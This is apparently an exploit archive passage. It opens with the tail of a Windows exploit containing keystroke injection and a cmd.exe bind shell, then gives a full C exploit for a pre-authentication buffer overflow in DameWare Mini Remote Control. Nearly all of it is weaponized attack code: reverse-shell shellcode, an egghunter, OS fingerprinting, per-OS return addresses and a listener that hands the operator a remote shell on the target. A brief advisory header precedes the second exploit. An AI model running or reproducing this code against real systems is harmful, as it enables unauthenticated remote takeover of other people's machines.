keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
}
}
}
keybd_event(VK_RETURN,1,0,0);
keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0);
exit(1);
}
}
/**************************************************************/


int BindShell(void) { //Bind Shell. POrt 65535


SOCKET s,s2;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSADATA HWSAdata;
struct sockaddr_in sa;
int len;


if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
exit(1); }


sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(HAXORCITOS);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
len=sizeof(sa);
if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
return(-1); }
if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }
s2 = accept(s,(struct sockaddr *)&sa,&len);
closesocket(s);


ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) );
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = (void *) s2; // SOCKET
si.hStdOutput = (void *) s2;
si.hStdError = (void *) s2;
if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) {
doFormatMessage(GetLastError());
return(-1);
}


WaitForSingleObject( pi.hProcess, INFINITE );
closesocket(s);
closesocket(s2);
printf("SALIMOS...\n");
Sleep(5000);
return(1);



}
/**************************************************************/
void main(int argc, char* argv[])
{
HWND console_wnd = NULL;


if (argc >= 2) {
pid = atoi (argv[1]);
strncpy(buf,argv[0],sizeof(buf)-1);
EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));
} else {
BindShell();
}
}
/**************************************************************/

/********************************************************************************

* _ ______
* (_)___ ____ ____ / ____/
* / / __ \/ __ \/ __ \/___ \
* / / /_/ / / / / /_/ /___/ /
* __/ / .___/_/ /_/\____/_____/
* /___/_/======================
********************************************************************************
*
*
* DameWare Mini Remote Control Client Agent Service
* Another Pre-Authentication Buffer Overflow
* By Jackson Pollocks No5
* www.jpno5.com
*
*
* Summary
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* DameWare Mini Remote Control is "A lightweight remote control intended primarily
* for administrators and help desks for quick and easy deployment without
* external dependencies and machine reboot.
*
* Developed specifically for the 32-bit Windows environment (Windows 95/98/Me/NT/2000/XP),
* DameWare Mini Remote Control is capable of using the Windows challenge/response authentication
* and is able to be run as both an application and a service.
*
* Some additional features include View Only, Cursor control, Remote Clipboard, Performance Settings,
* Inactivity control, TCP only, Service Installation and Ping."
*
* A buffer overflow vulnerability can be exploited remotely by an unauthenticated attacker
* who can access the DameWare Mini Remote Control Server.
*
* By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP.
* An attacker can construct a specialy crafted packet and exploit this vulnerability.
* The vulnerability is caused by insecure calls to the lstrcpyA function when checking the username.
*
*
* Severity: Critical
*
* Impact: Code Execution
*
* Local: Yes
*
* Remote: Yes
*
* Patch: Download version 4.9.0 or later and install over your existing installation.
* You can download the latest version of your DameWare Development Product at
* http://www.dameware.com/download
*
* Details: Affected versions will be any ver in above 4.0 and prior to 4.9
* of the Mini Remote Client Agent Service (dwrcs.exe).
*
* Discovery: i discovered this while using the dameware mini remote control client.
* i accidently pasted in a large string of text instead of my username.
* Clicking connect led to a remote crash of the application server.
*
* Credits: Can't really remember who's shellcode i used, more than likely it was
* written by Brett Moore.
*
* The egghunter was written by MMiller(skape). {Which kicks ass btw}
*
* Thanks to spoonm for tracking that NtAccessCheckAndAuditAlarm
* universal syscall down.
*
* Some creds to Adik as well, i did code my own exploit but it had none
* of that fancy *BLEEP* like OS and SP detection. So basicly i just modded
* the payload from the old dameware exploit(ver 3.72).
*
* A little cred to me as well, after all i did put all them guys great
* work together to make something decent
*
********************************************************************************
****/

#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")

#define ACCEPT_TIMEOUT 25
#define RECVTIMEOUT 15

#define UNKNOWN 0
#define WIN2K 1
#define WINXP 2
#define WIN2K3 3
#define WINNT 4

unsigned char rshell[] = {
"\x41\x42\x41\x42\x41\x42\x41\x42\x90\x90\x90\x90\x90\x90\x90\x90"// For The Egghunter
"\x90\xFC\x6A\xEB\x52\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B"// Reverse Shell
"\x45\x3C\x8B\x7C\x05\x78\x01\xEF\x83\xC7\x01\x8B\x4F\x17\x8B\x5F"
"\x1F\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84"
"\xC0\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23\x01\xEB\x66\x8B\x0C\x4B\x8B\x5F\x1B\x01\xEB\x03\x2C"
"\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40\x30\x8B\x40\x0C"
"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E\xEC\x50\xFF\xD6"
"\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5F\x54\xFF\xD0"
"\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66\x81\xED\x08\x02"
"\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF\xD6\x53\x53\x53"
"\x53\x43\x53\x43\x53\xFF\xD0\x68\x90\x90\x90\x90\x66\x68\x90\x90"
"\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF\xD6\x6A\x10\x51"
"\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50\x59\x29\xCC\x89"
"\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD\xFE\x42\x2D\xFE"
"\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3\x16\xFF\x75\x28"
"\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51\x55\x51\xFF\xD0"
"\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37\xFF\xD0\x68\xE7"
"\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF\xD0\x68\xEF\xCE"
"\xE0\x60\x53\xFF\xD6\xFF\xD0"
};

unsigned char buff[40] = {
"\x30\x11\x00\x00\x00\x00\x00\x00\xC3\xF5\x28\x5C\x8F\xC2\x0D\x40"// OS Detection
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00"
};

unsigned char fpay[] = {
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"// Egghunter
"\xef\xb8\x41\x42\x41\x42\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
"\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc"
};


long ip(char *hostname);
void shell (int sock);

int check(char *host,unsigned short tport, unsigned int *sp);

struct timeval tv;
fd_set fds;
char buff1[5000]="";

struct spl{
unsigned long eip; char off[20];
};

struct{
char type[10]; struct spl sp[7];
}

target_os[]={{ //Could proberly be doing with some better offsets
"UNKNOWN" ,{{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },
{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },
{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN 2000" ,{{ 0x750362c3,"ws2_32.dll" },{ 0x75035173,"ws2_32.dll" },
{ 0x7C2FA0F7,"ws2_32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },
{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },
{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },
{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN 2003" ,{{ 0x77E216B8,"advapi32.dll" },{ 0x77FD1F89,"ntdll.dll" },
{ 0x77E216B8,"ntdll.dll" },{ 0x77E216B8,"advapi32.dll" },{ 0x00000000,"unknown.dll" },
{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN NT4" ,{{ 0x77777777,"unknown.dll" },{ 0x77777776,"unknown.dll" },
{ 0x77777775,"unknown.dll" },{ 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll" },
{ 0x77777772,"unknown.dll" },{ 0x77f32836,"kernel32.dll" }}}
};

int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP, localTCP, inAccTCP;
int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon;

unsigned char packet[24135]="";
unsigned short lport, tport;
unsigned long lip, tip;
unsigned int ser_p=0;
int ver=0;

printf("\n\n ====== D4m3w4r3 eXpLo1t, By jpno5 ======\n");
printf(" ====== http://www.jpno5.com ======\n\n");
if(argc < 5){ printf("[+] %s Target_Ip Target_Port Return_Ip Return_Port\n\n",argv[0]);return 1;}

WSAStartup(0x0202, &wsaData);

tip=ip(argv[1]);
tport = atoi(argv[2]);
lip=inet_addr(argv[3])^(long)0x00000000;
lport=htons(atoi(argv[4]))^(short)0x0000;

memcpy(&rshell[184], &lip, 4);
memcpy(&rshell[190], &lport, 2);

memset(&targetTCP, 0, sizeof(targetTCP));memset(&localTCP, 0, sizeof(localTCP));

targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = tip;
targetTCP.sin_port = htons(tport);

localTCP.sin_family = AF_INET;
localTCP.sin_addr.s_addr = INADDR_ANY;
localTCP.sin_port = htons((unsigned short)atoi(argv[4]));

if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("\t\t\t[ FAILED ]\n");
WSACleanup();
return 1;
}
if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("\t\t\t[ FAILED ]\n");
WSACleanup();
return 1;
}

printf("[#] Listening For Shell On: %s...",argv[4]);

if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0){
printf("\t\t\n Binding To Port: %s Failed! Make Sure It Aint In Use\n",argv[4]);
WSACleanup();
return 1;
}

if(listen(localSockTCP,1) != 0){
printf("\t\t\t[ FAILED ]\nFailed to listen on port: %s!\n",argv[4]);
WSACleanup();
return 1;
}

ver = check(argv[1],(unsigned short)atoi(argv[2]),&ser_p);

printf("\n[*] Target: %s SP: %d...",target_os[ver].type,ser_p);

memcpy(packet,"\x10\x27",2);
memcpy(packet+0xc4+9,rshell,strlen(rshell));
*(unsigned long*)&packet[516] = target_os[ver].sp[ser_p].eip;
memcpy(packet+520,fpay,strlen(fpay));

if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
printf("\n[x] Connection to host failed!\n");
WSACleanup();
exit(1);
}

switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;FD_ZERO(&fds);
FD_SET(sockTCP,&fds);

if((select(1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);}else{
printf("[x] Timeout! Failed to recv packet.\n");
exit(1);
}

memset(buff1,0,sizeof(buff1));
switchon=0;ioctlsocket(sockTCP,FIONBIO,&switchon);

if (send(sockTCP, buff, sizeof(buff),0) == -1){
printf("[x] Failed to inject packet!\n");
WSACleanup();
return 1;
}

switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;tv.tv_usec = 0;
FD_ZERO(&fds);FD_SET(sockTCP,&fds);

if((select(sockTCP+1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);switchon=0;
ioctlsocket(sockTCP,FIONBIO,&switchon);

if (send(sockTCP, packet, sizeof(packet),0) == -1){
printf("[x] Failed to inject packet! \n");
WSACleanup();
return 1;
}
}else{
printf("\n[x] Timedout! Failed to receive packet!\n");
WSACleanup();
return 1;
}

closesocket(sockTCP);

printf("\n[*] Waiting for Shell...\r");

switchon=1;
ioctlsocket(localSockTCP,FIONBIO,&switchon);
tv.tv_sec = ACCEPT_TIMEOUT;
tv.tv_usec = 0;FD_ZERO(&fds);
FD_SET(localSockTCP,&fds);

if((select(1,&fds,0,0,&tv))>0){
acsz = sizeof(inAccTCP);
accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);
printf("\n[*] Enjoy...\n\n");
shell(accSockTCP);
}else{
printf("\n[x] Exploit Failed! Proberly Patched\n");
WSACleanup();
}
return 0;
}

long ip(char *hostname) {
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
printf("[x] Failed to resolve host: %s!\n\n",hostname);
WSACleanup();exit(1);
}

memcpy(&ipaddr, he->h_addr, he->h_length);}return ipaddr;}

void shell (int sock){
struct timeval tv;int length;
unsigned long o[2];
char buffer[1000];

tv.tv_sec = 1;tv.tv_usec = 0;
while (1){ o[0] = 1;o[1] = sock;
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1){length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0) {
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0) {
printf ("[x] Connection closed.\n");
WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer));
if (length <= 0) {
printf ("[x] Connection closed.\n");
WSACleanup();return;}length = send(sock, buffer, length, 0);
if (length <= 0) {
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}}}}

int check(char *host,unsigned short tport, unsigned int *sp){

int sockTCP,switchon;
struct sockaddr_in targetTCP;
struct timeval tv;fd_set fds;

memset(&targetTCP,0,sizeof(targetTCP));
targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr =
inet_addr(host);targetTCP.sin_port = htons(tport);

if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("\t\t\t[ FAILED ]\n Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}

if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
printf("[x] Connection to host failed!\n");
WSACleanup();
exit(1);
}

switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);FD_SET(sockTCP,&fds);

if((select(1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);}
else{
printf("[x]Timedout! Doesn't Look Like A Dameware Server\n");
exit(1);
}

switchon=0;
ioctlsocket(sockTCP,FIONBIO,&switchon);

if (send(sockTCP, buff, sizeof(buff),0) == -1){
printf("[x] Failed\n");
WSACleanup();
return 1;
}

switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);

tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;FD_ZERO(&fds);
FD_SET(sockTCP,&fds);

if((select(sockTCP+1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);
closesocket(sockTCP);
} else {
printf("\n[x] Timedout!\n");
WSACleanup();
return 1;
}

if(buff1[8]==5 && buff1[12]==0){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WIN2K;
} else if(buff1[8]==5 && buff1[12]==1){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WINXP;
} else if(buff1[8]==5 && buff1[12]==2){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WIN2K3;
} else if(buff1[8]==4){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WINNT;
} else{
closesocket(sockTCP);
return UNKNOWN;
}
}